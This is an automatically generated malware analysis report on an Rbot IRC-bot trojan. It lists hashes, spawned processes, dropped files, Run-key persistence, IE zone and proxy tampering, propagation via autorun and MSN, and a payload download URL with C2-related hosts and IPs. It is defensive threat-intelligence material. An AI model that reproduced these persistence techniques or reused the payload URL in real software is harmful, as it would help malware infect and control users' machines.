Rbot_d7044fa0ef

by malwarelabrobot on April 1st, 2014 in Malware Descriptions.

AutoIt:Injector-GA [Trj] (Avast), Trojan.GenericKD.1576106 (AdAware), mzpefinder_pcap_file.YR, GenericIRCBot.YR, GenericMSNWorm.YR, Rbot.YR, GenericAutorunWorm.YR, BackdoorIRC.YR, Blazebot.YR, GenericProxy.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: d7044fa0efe14eb154da11843477d3df
SHA1: acb19148e9d74f57262a06cb06444aa317becf61
SHA256: a38e003b2c65db4a68a0adf0ee67b96c258364e337c862a5e54243d8b809937a
SSDeep: 12288:zhkDgouVA2nxKkorvdRgQriDwOIxmxiZnYQE7PJcE4adoSH6cEPj4:5RmJkcoQricOIQxiZY1iamSa3Pj4
Size: 771406 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-01-29 23:32:28
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via an IRC channel.
MSNWorm A worm can spread its copies through MSN Messenger.
Trojan-Proxy This program can launch a proxy server (SOCKS4) on a designated TCP port.


Process activity

The Trojan creates the following process(es):

ooulnvm.exe:316
AUE68.exe:464
skype.exe:984
skype.exe:444
%original file name%.exe:1476
%original file name%.exe:228
msn.exe:1336
msn.exe:204

The Trojan injects its code into the following process(es):

ooulnvm.exe:1592
skype.exe:1292
csrss.exe:268

File activity

The process ooulnvm.exe:316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (116736 bytes)
%Documents and Settings%\%current user%\G73A28.YX3 (92160 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (0 bytes)
%Documents and Settings%\%current user%\G73A28.YX3 (0 bytes)

The process ooulnvm.exe:1592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (12288 bytes)
%WinDir%\skype.exe (530432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\1738599339.ms1[1] (530432 bytes)
%Documents and Settings%\%current user%\Cookies\test@directxex[1].txt (118 bytes)

The process AUE68.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\F26D\msn.exe (904976 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\F26D\__tmp_rar_sfx_access_check_7102750 (0 bytes)

The process skype.exe:1292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\svchost.exe (528384 bytes)

The process skype.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\AUE68.exe (757524 bytes)

The process %original file name%.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%System%\ooulnvm.exe (771406 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\G73A28.YX3 (92160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (116736 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\G73A28.YX3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)

The process msn.exe:1336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\A85F69.MS5 (67072 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (68608 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\A85F69.MS5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (0 bytes)

The process msn.exe:204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\csrss.exe (746376 bytes)

Registry activity

The process ooulnvm.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 6B 6B 7D 45 7F 09 7A 1A 38 D2 EF 2D E9 DA 62"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

The process ooulnvm.exe:1592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "ooulnvm.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\yOLE]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\System\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"Skype.exe" = "Spinetai didel"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E6 9D BF 2A 9C 3D 37 40 A0 4B 41 40 A5 F4 91"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes (host names with no dots that are not assigned to any other zone) to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "ooulnvm.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "ooulnvm.exe"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "ooulnvm.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "ooulnvm.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process AUE68.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 D8 54 E7 C8 1D D8 6B F0 76 5E 32 26 8B 60 D8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\F26D]
"msn.exe" = "msn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes (host names with no dots that are not assigned to any other zone) to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process skype.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB E1 AD E2 0B 9A A9 FC 51 A9 F2 98 1A 82 28 4F"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched" = "%Documents and Settings%\All Users\svchost.exe"

The process skype.exe:984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 01 BF 67 71 68 22 95 00 3A F6 F8 C0 06 E8 56"

The process skype.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE E1 3D 16 6E E6 2B 29 3A 98 4A 27 13 53 A6 CA"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp]
"AUE68.exe" = "AUE68"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes (host names with no dots that are not assigned to any other zone) to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 15 E0 7B CD 03 23 4E AA EB 8C 02 23 36 6E 8E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 3C 37 70 BD 89 87 F9 E5 E7 E6 10 DE F5 B7 CF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

The process msn.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E D5 CE 45 BE 91 EC 87 DA 94 08 F9 28 64 96 4D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

The process msn.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 8E CC 11 CB DE D4 E0 49 4E 4A AB 05 D7 AB 28"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"

Dropped PE files

MD5 File path
0d468d8b2a1f7f599575a60378554192 c:\Documents and Settings\All Users\svchost.exe
1838249f6e218963310b439c330e968f c:\Documents and Settings\test\F26D\msn.exe
846e69454ddca6f801239f0ff1e120be c:\Documents and Settings\test\Local Settings\Temp\AUE68.exe
0d468d8b2a1f7f599575a60378554192 c:\Documents and Settings\test\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\1738599339.ms1[1]
0d468d8b2a1f7f599575a60378554192 c:\WINDOWS\skype.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

A worm can spread its copies through MSN Messenger.

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 3, 8, 1
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 525852 526336 4.63347 61ffce4768976fa0dd2a8f6a97b1417a
.rdata 532480 57280 57344 3.32693 0354bc5f2376b5e9a4a3ba38b682dff1
.data 589824 108376 26624 1.49032 8033f5a38941b4685bc2299e78f31221
.rsrc 700416 16376 16384 3.06916 6c0529185ffae00932f6d33565ffc4db

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
25ead6906ed4c4c9d57568d7cebf8b91

URLs

URL IP
hxxp://directxex.com/uploads/1738599339.ms1.exe?dl=1 108.162.199.96
hxxp://www.whatismyip.com/ 190.93.249.117
hxxp://checkip.dyndns.com/
checkip.dyndns.org 216.146.39.70
vids.p0rn-lover.us 82.145.57.209
videos.p0rn-lover.us 176.31.75.42


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CNC Shadowserver Reported CnC Server IP group 7
ET CHAT IRC PONG response
ET CHAT IRC PING command
ET TROJAN IRC Potential bot update/download via ftp command
ET CHAT IRC authorization message
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET POLICY Internal Host Retrieving External IP via whatismyip.com - Possible Infection
ET CNC Shadowserver Reported CnC Server IP group 39
ET MALWARE User-Agent (Mozilla/4.0 (compatible))
ET POLICY PE EXE or DLL Windows file download
ET POLICY DynDNS CheckIp External IP Address Server Response
ET CHAT IRC JOIN command
ET CHAT IRC NICK command
ET CHAT IRC USER command
ET CHAT IRC PRIVMSG command

Traffic

GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:18:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da6191e9b8143e8df9f92ef6df9da84231395487139700; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 10f1fddf2b9f072b-AMS
830..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:1395415713,byc:0,owlid:"cf",
bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/ne
xp/dok8v=02fcfa4f56/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"
fcb473feb94cd35c093199b4a1ab2d93b1ddb512-1395487139-1800",zone:"whatis
myip.com",rocket:"a",apps:{"ga_key":{"ua":"UA-4975660-1","ga_bs":"2"}}
}];document.write('<script type="text/javascript" src="//ajax.cloud
flare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js"><' '\
/script>');}}catch(e){};.//]]>.</script>.<script type="
text/javascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.pu
sh(['_setAccount', 'UA-4975660-1']);._gaq.push(['_trackPageview']);..(
function() {.var ga = document.createElement('script'); ga.type = 'tex
t/javascript'; ga.async = true;.ga.src = ('https:' == document.locatio
n.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga
.js';.var s = document.getElementsByTagName('script')[0]; s.parentNode
.insertBefore(ga, s);.})();..(function(b){(function(a){"__CF"in b&&"DJ
S"in b.__CF?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListen
er("load",a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Even
t"in FB&&"subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",fun
ction(a){_gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.su
bscribe("edge.remove",function(a){_gaq.push(["_trackSocial","faceb

<<< skipped >>>

GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 22 Mar 2014 11:19:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df852822566c087fb00173873c57f03ca1395487139869; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 10f1fde02bcc072b-AMS
830..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:1395415713,byc:0,owlid:"cf",
bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/ne
xp/dok8v=02fcfa4f56/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"
f6c3f59135c67fcf60ee41f3dfba7593cb660797-1395487140-1800",zone:"whatis
myip.com",rocket:"a",apps:{"ga_key":{"ua":"UA-4975660-1","ga_bs":"2"}}
}];document.write('<script type="text/javascript" src="//ajax.cloud
flare.com/cdn-cgi/nexp/dok8v=b064e16429/cloudflare.min.js"><' '\
/script>');}}catch(e){};.//]]>.</script>.<script type="
text/javascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.pu
sh(['_setAccount', 'UA-4975660-1']);._gaq.push(['_trackPageview']);..(
function() {.var ga = document.createElement('script'); ga.type = 'tex
t/javascript'; ga.async = true;.ga.src = ('https:' == document.locatio
n.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga
.js';.var s = document.getElementsByTagName('script')[0]; s.parentNode
.insertBefore(ga, s);.})();..(function(b){(function(a){"__CF"in b&&"DJ
S"in b.__CF?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListen
er("load",a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Even
t"in FB&&"subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",fun
ction(a){_gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.su
bscribe("edge.remove",function(a){_gaq.push(["_trackSocial","faceb

<<< skipped >>>

GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache


